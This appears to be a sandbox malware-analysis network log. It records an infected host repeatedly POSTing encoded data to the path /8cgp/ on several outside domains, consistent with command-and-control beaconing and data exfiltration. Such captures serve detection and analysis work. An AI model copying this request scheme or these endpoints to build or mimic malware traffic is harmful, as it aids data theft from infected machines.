                                                                    Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;
                                                                    Apr 24, 2024 12:32:34.106792927 CEST1289INData Raw: 20 68 6f 73 74 69 6e 67 20 66 6f 72 20 79 6f 75 72 20 73 75 63 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65 63 74 73 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 73 74 69 6e 67 65 72
                                                                    Data Ascii: hosting for your successful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add w
                                                                    Apr 24, 2024 12:32:34.106822968 CEST1289INData Raw: 5b 5d 2c 6e 3d 30 2c 74 3d 6f 2e 6c 65 6e 67 74 68 3b 6e 3c 74 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d 28 36 33 34 38 38 26 28 72 3d 6f 5b 6e 2b 2b 5d 29 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28
                                                                    Data Ascii: [],n=0,t=o.length;n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join(""
                                                                    Apr 24, 2024 12:32:34.106865883 CEST1289INData Raw: 69 63 65 28 66 2c 30 2c 61 29 2c 66 2b 2b 7d 69 66 28 74 29 66 6f 72 28 66 3d 30 2c 77 3d 6d 2e 6c 65 6e 67 74 68 3b 66 3c 77 3b 66 2b 2b 29 79 5b 66 5d 26 26 28 6d 5b 66 5d 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6d 5b 66
                                                                    Data Ascii: ice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf1
                                                                    Apr 24, 2024 12:32:34.106899977 CEST100INData Raw: 2c 61 63 63 6f 75 6e 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 74 68 4e 61 6d 65 22 29 3b 61 63 63 6f 75 6e 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 70 75 6e 79 63 6f 64 65 2e 54 6f 55 6e 69 63 6f 64 65 28
                                                                    Data Ascii: ,account=document.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    58 | 192.168.11.20 | 50303 | 118.27.122.214 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:32:39.401813984 CEST | 668 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.kansaiwoody.com
                                                                    Origin: http://www.kansaiwoody.com
                                                                    Referer: http://www.kansaiwoody.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Ascii: Xh9lX=Ff+IoCJIoBgLrkGQMcJeEENjXbUpkFN3M2n+vQl4WKRRj70PPhQMuw2qAClmZyL3vfnMAxB3QgpOvF1cboP2FF+oyCmjS8S5GkXx2oMa6AkqR25z73MSzvg+lVhrE4ukfdjToPimmHi+0Rj+tJYRIUyCy01dlmsnMVRnYY5iQ1Ng2uwiyuGr/C5Nsq7Xuw8xJA==
                                                                    Apr 24, 2024 12:32:39.681875944 CEST | 377 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:32:39 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Content-Encoding: gzip


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    59 | 192.168.11.20 | 50304 | 118.27.122.214 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:32:42.213643074 CEST | 1008 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.kansaiwoody.com
                                                                    Origin: http://www.kansaiwoody.com
                                                                    Referer: http://www.kansaiwoody.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Ascii: Xh9lX=Ff+IoCJIoBgLqHOQKPheBkNiKrUprlNNM2r+vRwgW51RgaEPOgQMvw2qUSljECLwvfjuAzF3QkBOv2NcS4P3Kl+v7im+ZcSzGkKY2pYa9zgqQ0Rz+j4Rg/g8s1hqNYvlfduzoOacl1++0xD+q5YQTUyJ9U1LlGZ5EhdWQLhfKA1L+scy3cmDuiRqhpjHizI5KLkGSYKchhTDMXhrbuH4PfhrDKRfrX8sUfgCfULihQYzXmhuyDoCVSlvOxIXjiLqVYbrB5uUTuH+1pi27YWjOGd1kSF4n7sMIT3alfiHwa3KGkzokhWkU4x2hxaTaMYqin90sNe9Y07aCWHLTVFTwcrUpCn56HXn6QK2ygGQjTHu3CiO1TnqyQOYhNZ+LgZkU4J/8Vc27ElxA5Nt4pAiSBGfdqJs8ffQjl4cXg+e3SLPYW9RWWscNt+u2DTGiX3sxNrfXB/AEcW7hTIf7Fa0PQdS9cmmxRcrW5sE6ugk57q7IUacIXZTuL0mh/kPvCQE7NSDisdaFJEaIm/BqT00Q2w=
                                                                    Apr 24, 2024 12:32:42.484846115 CEST | 377 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:32:42 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Content-Encoding: gzip


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    60 | 192.168.11.20 | 50305 | 118.27.122.214 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:32:45.027126074 CEST | 1289 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.kansaiwoody.com
                                                                    Origin: http://www.kansaiwoody.com
                                                                    Referer: http://www.kansaiwoody.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:32:45.866132975 CEST | 377 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:32:45 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Content-Encoding: gzip


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    61 | 192.168.11.20 | 50306 | 118.27.122.214 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:32:47.832206964 CEST | 392 | OUT | GET /8cgp/?QDnH=ERXP8&Xh9lX=IdWor3433k1T0EOhXt9dLiY9DbR+hWBcDBqvgnp+doAH8LsyGz9SvmmDD05EUVbRqIr7chpXUFkFyWAkdZSUbSWj4Fm/Hc2PGDqx2ZME3zVnMVls2zAW0u4= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.kansaiwoody.com
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:32:48.096751928 CEST | 359 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:32:47 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Content-Length: 196
                                                                    Connection: close
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    62 | 192.168.11.20 | 50307 | 157.7.107.63 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:32:53.385674000 CEST | 680 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.a-two-spa-salon.com
                                                                    Origin: http://www.a-two-spa-salon.com
                                                                    Referer: http://www.a-two-spa-salon.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Ascii: Xh9lX=1EGodtIZG4lCExT1V+445OC1KdB80aC1WYX3cKLY5cEqJslP2IWjTSeY6XdKcLF1ZnCztb3b/Zc1RDAiCS78vx7TBmLvdrZsDqhc0b48z8X09JnNPg3bE3zemBNkL6+bL/WVbev1lIPx6SSvzwlfJ4SXxU2CJKfgXrlAu6EDaucGUlkkvYKsX8xpoBj/CJy7jg==
                                                                    Apr 24, 2024 12:32:53.867836952 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:32:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Server: Apache
                                                                    X-Powered-By: PHP/8.2.18
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
                                                                    Data Ascii: 3b58<!DOCTYPE html><html class="pc" lang="ja"><head><meta charset="UTF-8">...[if IE]><meta http-equiv="X-UA-Compatible" content="IE=edge"><![endif]--><meta name="viewport" content="width=device-width"><title> | A-two </title><meta name="description" content=""><link rel="pingback" href="http://a-two-spa-salon.com/xmlrpc.php"><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//a-two-spa-salon.com' /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/feed/" /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/comments/feed/" /><script type="tex


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    63 | 192.168.11.20 | 50308 | 157.7.107.63 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:32:56.186144114 CEST | 1020 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.a-two-spa-salon.com
                                                                    Origin: http://www.a-two-spa-salon.com
                                                                    Referer: http://www.a-two-spa-salon.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:32:56.693330050 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:32:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Server: Apache
                                                                    X-Powered-By: PHP/8.2.18
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
                                                                    Data Ascii: 451<!DOCTYPE html><html class="pc" lang="ja"><head><meta charset="UTF-8">...[if IE]><meta http-equiv="X-UA-Compatible" content="IE=edge"><![endif]--><meta name="viewport" content="width=device-width"><title> | A-two </title><meta name="description" content=""><link rel="pingback" href="http://a-two-spa-salon.com/xmlrpc.php"><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//a-two-spa-salon.com' /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/feed/" /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/comments/feed/" /><script type="text


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    64 | 192.168.11.20 | 50309 | 157.7.107.63 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:32:58.983531952 CEST | 2578 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.a-two-spa-salon.com
                                                                    Origin: http://www.a-two-spa-salon.com
                                                                    Referer: http://www.a-two-spa-salon.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Ascii: sImv2PNw1HNGzrHuqjxrst506kY0hJNvmxUWBdwmxQTakMlfT71ogGRQuqWt0jbpIzWHbIDfxoHhBxg9I3wzjIx2OAR75lF880kThNW4bXJ9JqX/mKPX0VP3wgJtb2zfBOHj+rsuXBQotu9hKw8Mv69pP7nZWNJFKTA1I3YHy4QhvFyryclWLpTuSKCVMoTv8xzfXXI2ic6xhmGeIZBqkzHcJEmLT6U9WmJAAxdpl74BSZmDoZc
                                                                    Apr 24, 2024 12:32:59.254148006 CEST2578OUTData Raw: 49 79 42 45 76 69 6b 50 75 4c 61 54 36 42 4d 50 66 53 41 74 43 62 74 76 73 55 48 43 58 2f 76 49 43 6e 74 48 36 51 43 39 4c 4a 68 35 50 41 73 4d 53 44 6c 54 43 58 44 56 5a 4e 51 77 68 69 73 42 69 49 69 7a 34 6c 52 35 71 2f 64 51 77 78 33 56 44 78
                                                                    Data Ascii: IyBEvikPuLaT6BMPfSAtCbtvsUHCX/vICntH6QC9LJh5PAsMSDlTCXDVZNQwhisBiIiz4lR5q/dQwx3VDxWqNA6O3BL9GZwhi8829viS7UrB+MPQ8zDVXOOl0VBYKoShdELwL8TGF9FpxCZPEEjvGiRt9WKsQgaj5YWzAqkbGQ9LoY1CxsVveXK4Hp8kYl1I/uF5ZpEnR052crb/YLAWFYmmdomfmAV1T8MM9vh4gbe1QgIXpkf
                                                                    Apr 24, 2024 12:32:59.254352093 CEST15468OUTData Raw: 6c 41 52 42 45 4c 35 45 65 65 79 68 56 70 71 58 6c 2f 44 49 63 6a 49 50 59 77 47 63 35 59 6a 6e 43 4c 2f 4d 69 4f 6e 72 59 78 65 58 35 69 43 6d 76 6d 6c 61 69 49 4f 38 72 34 64 49 6c 59 6d 51 2f 71 79 67 56 43 52 65 61 4c 6c 32 67 79 4e 48 6c 38
                                                                    Data Ascii: lARBEL5EeeyhVpqXl/DIcjIPYwGc5YjnCL/MiOnrYxeX5iCmvmlaiIO8r4dIlYmQ/qygVCReaLl2gyNHl8o19UwqmUjbtfsNR7IqEuZPrB2jjBgqVcAB9XMP7xvTc+ukD8CjgpBSETcIA1poEslbG2J+g6MUGbJEt35uMCBYlVgZjMwECECRMsnWg6VL+PJnWD3TNtgP+NPyRlHDjh11Ipd8x8P5JPXiPPu+eNOhmHZrRyBAr0c
                                                                    Apr 24, 2024 12:32:59.524175882 CEST1289OUTData Raw: 65 2f 51 6a 53 6f 66 68 68 4f 6f 41 75 4f 6b 68 71 61 31 50 52 4c 55 61 54 39 34 65 45 31 5a 66 42 36 6e 36 38 46 6f 6a 4b 78 6c 4b 6f 73 64 58 78 4c 6a 4d 62 31 74 65 4c 79 5a 76 54 50 69 71 56 48 70 78 6d 46 33 33 50 75 53 4d 6d 4e 49 6c 67 46
                                                                    Data Ascii: e/QjSofhhOoAuOkhqa1PRLUaT94eE1ZfB6n68FojKxlKosdXxLjMb1teLyZvTPiqVHpxmF33PuSMmNIlgFrXCxsU+VTO2TD4/4YRyWW6abHHsG9RpiGq1BkBDppBuhGPbcj0r2x+z15t15zWrQZYKEFz0SxyW4MP2abIacozHxUALAJcLM3tgcOBQaIlKDv+Z+8ZmG6kqzE25za3nQAVJGEMcTFSnfzQU5rALJ4YY03Kj8Fo2pM
                                                                    Apr 24, 2024 12:32:59.524377108 CEST3867OUTData Raw: 73 37 39 75 44 47 4d 79 56 78 42 43 41 56 59 53 67 6f 31 2b 61 6c 62 36 75 79 69 79 35 2b 45 79 74 66 74 56 5a 56 35 55 4d 6d 62 64 7a 4a 55 39 62 63 50 49 38 52 59 74 49 67 58 68 64 76 33 31 55 2f 31 44 69 6f 67 30 49 44 64 5a 75 78 7a 64 45 39
                                                                    Data Ascii: s79uDGMyVxBCAVYSgo1+alb6uyiy5+EytftVZV5UMmbdzJU9bcPI8RYtIgXhdv31U/1Diog0IDdZuxzdE9hu3tCwnfMWGDu4eBluNAhp+O2co462MDcTujIKCTZYfN7Sbers0CgBeMuzKSp60Ii3G+Pl3es/z3xMWPWEymfkyL0Wm1Jy3SR0EsU38y/xti0hxzgnUtCO3nInlR2nQCRLydRS9x6Lc4dMKORHpS8H8Cey+eO/3R0
                                                                    Apr 24, 2024 12:32:59.524521112 CEST6445OUTData Raw: 38 47 6b 76 4c 38 4a 35 47 50 74 49 4f 69 59 34 70 62 66 6c 7a 41 38 30 33 67 6e 35 34 5a 32 58 30 78 58 69 6c 33 61 35 50 51 65 4a 59 39 55 76 6c 67 4d 6e 71 47 49 2f 45 53 79 6b 30 59 74 35 6e 44 6d 61 70 33 76 77 46 31 4d 51 78 33 77 37 56 4c
                                                                    Data Ascii: 8GkvL8J5GPtIOiY4pbflzA803gn54Z2X0xXil3a5PQeJY9UvlgMnqGI/ESyk0Yt5nDmap3vwF1MQx3w7VL/A5kl5oiK2Fw/VPSVKLSUWpdXq9x9t+z1aS4WMciRhmmS1LveyRcU17XJHtjERRbqtN58fiC7Ke0qW0BZaGy9XiwtvNGEnkHOMMLrZNXd24XwSxCe44BTHDu5PM5hHrHcvYsFDw3eOODIbOIgILg3fSntk5j95xd/
                                                                    Apr 24, 2024 12:32:59.524717093 CEST3145OUTData Raw: 4d 4d 54 78 6e 58 63 58 7a 44 71 54 38 42 58 33 58 4b 41 33 32 46 6c 4e 59 58 49 54 6e 66 48 33 2b 6b 45 53 2f 78 2b 50 75 68 54 59 73 62 47 48 47 6c 6f 43 37 2f 4d 2f 62 32 4d 58 41 49 50 37 72 76 77 55 4b 65 72 79 6c 56 63 34 59 4e 4e 70 78 58
                                                                    Data Ascii: MMTxnXcXzDqT8BX3XKA32FlNYXITnfH3+kES/x+PuhTYsbGHGloC7/M/b2MXAIP7rvwUKerylVc4YNNpxX5wPnHuOlEpL2tmsEZ1rEoZ/EM1PyJODrs+Cyqv3jDteFeP4jDsPDhxINwLAKJr9NzYzsIm5i3M0OuioOYVCbzfzNy7H3pCcqpJvr6TpLMRgP98KafwaHguBu/9xXmVJxf45uGD3kMdvw6v8VkKpC9eC8/hUWubbRF
Apr 24, 2024 12:32:59.989572048 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:32:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Server: Apache
                                                                    X-Powered-By: PHP/8.2.18
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
                                                                    Data Ascii: 451<!DOCTYPE html><html class="pc" lang="ja"><head><meta charset="UTF-8">...[if IE]><meta http-equiv="X-UA-Compatible" content="IE=edge"><![endif]--><meta name="viewport" content="width=device-width"><title> | A-two </title><meta name="description" content=""><link rel="pingback" href="http://a-two-spa-salon.com/xmlrpc.php"><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//a-two-spa-salon.com' /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/feed/" /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/comments/feed/" /><script type="text
Apr 24, 2024 12:32:59.989583969 CEST | 179 | IN | Data Ascii: /javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/co


Session ID | Source IP | Source Port | Destination IP | Destination Port
65 | 192.168.11.20 | 50310 | 157.7.107.63 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 12:33:01.772506952 CEST | 396 | OUT | GET /8cgp/?Xh9lX=4GuIeZ5/FrknERHMXrNh6P2zNKgrxoOsX8fLf9+FvaUhJPhi6YvqajOryTNmV9FzTg+fg8zx27kOMjM9ARbv/mO9DinSc6hkOsxZ/ooW+MqGv6LVFVbELEQ=&QDnH=ERXP8 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.a-two-spa-salon.com
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Apr 24, 2024 12:33:02.242464066 CEST | 507 | IN | HTTP/1.1 301 Moved Permanently
                                                                    Date: Wed, 24 Apr 2024 10:33:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Server: Apache
                                                                    X-Powered-By: PHP/8.2.18
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    X-Redirect-By: WordPress
                                                                    Location: http://a-two-spa-salon.com/8cgp/?Xh9lX=4GuIeZ5/FrknERHMXrNh6P2zNKgrxoOsX8fLf9+FvaUhJPhi6YvqajOryTNmV9FzTg+fg8zx27kOMjM9ARbv/mO9DinSc6hkOsxZ/ooW+MqGv6LVFVbELEQ=&QDnH=ERXP8
                                                                    X-Cache: MISS


Session ID | Source IP | Source Port | Destination IP | Destination Port
66 | 192.168.11.20 | 50311 | 203.161.49.193 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 12:33:15.652683973 CEST | 659 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.techfun.info
                                                                    Origin: http://www.techfun.info
                                                                    Referer: http://www.techfun.info/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Ascii: Xh9lX=w+f7fcPcqc3KaGgiiC2cejCz3HsNuELpdkgwC2pIqW5n3VhtgmBvBY5el2X8VIS6o68Hj/EWvH9KUl2VmTRfUZ6MwdAPOTl+BwNHOFQVeqHstONDdUWQuJzu7KSmiFpOZIvla91UokbbKMR4QeToC7f/1G/5fvwQVAtolDliOoDWx1p1upbbW9qW2O9QIu/cDg==
Apr 24, 2024 12:33:15.843475103 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:33:15 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
67 | 192.168.11.20 | 50312 | 203.161.49.193 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 12:33:18.353884935 CEST | 999 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.techfun.info
                                                                    Origin: http://www.techfun.info
                                                                    Referer: http://www.techfun.info/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Apr 24, 2024 12:33:18.543939114 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:33:18 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
68 | 192.168.11.20 | 50313 | 203.161.49.193 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 12:33:21.060810089 CEST | 2578 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.techfun.info
                                                                    Origin: http://www.techfun.info
                                                                    Referer: http://www.techfun.info/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Ascii: FIB23m5+cCCBVrPY2c7JXQPfpTuKNZCPm0qVKLWcf3R2J6Ogyb2SwY6AXiOA3Y+eNwRtDB9bP8fqYdNyVtBTT2ypZc2IISJb4yUfzVmDFUIXm+gKVGgTVh/9y6P4ChM4LLQUTL0j8EQsw+75qJsoRuAQ0iO7GzJhFOZxw+nqDYy4OoX175af226yrJ/gsDedlOPSe++ajVMDT7ev6JMymcExw0zlhsVdwBlScwuONTWfLHf1CKR
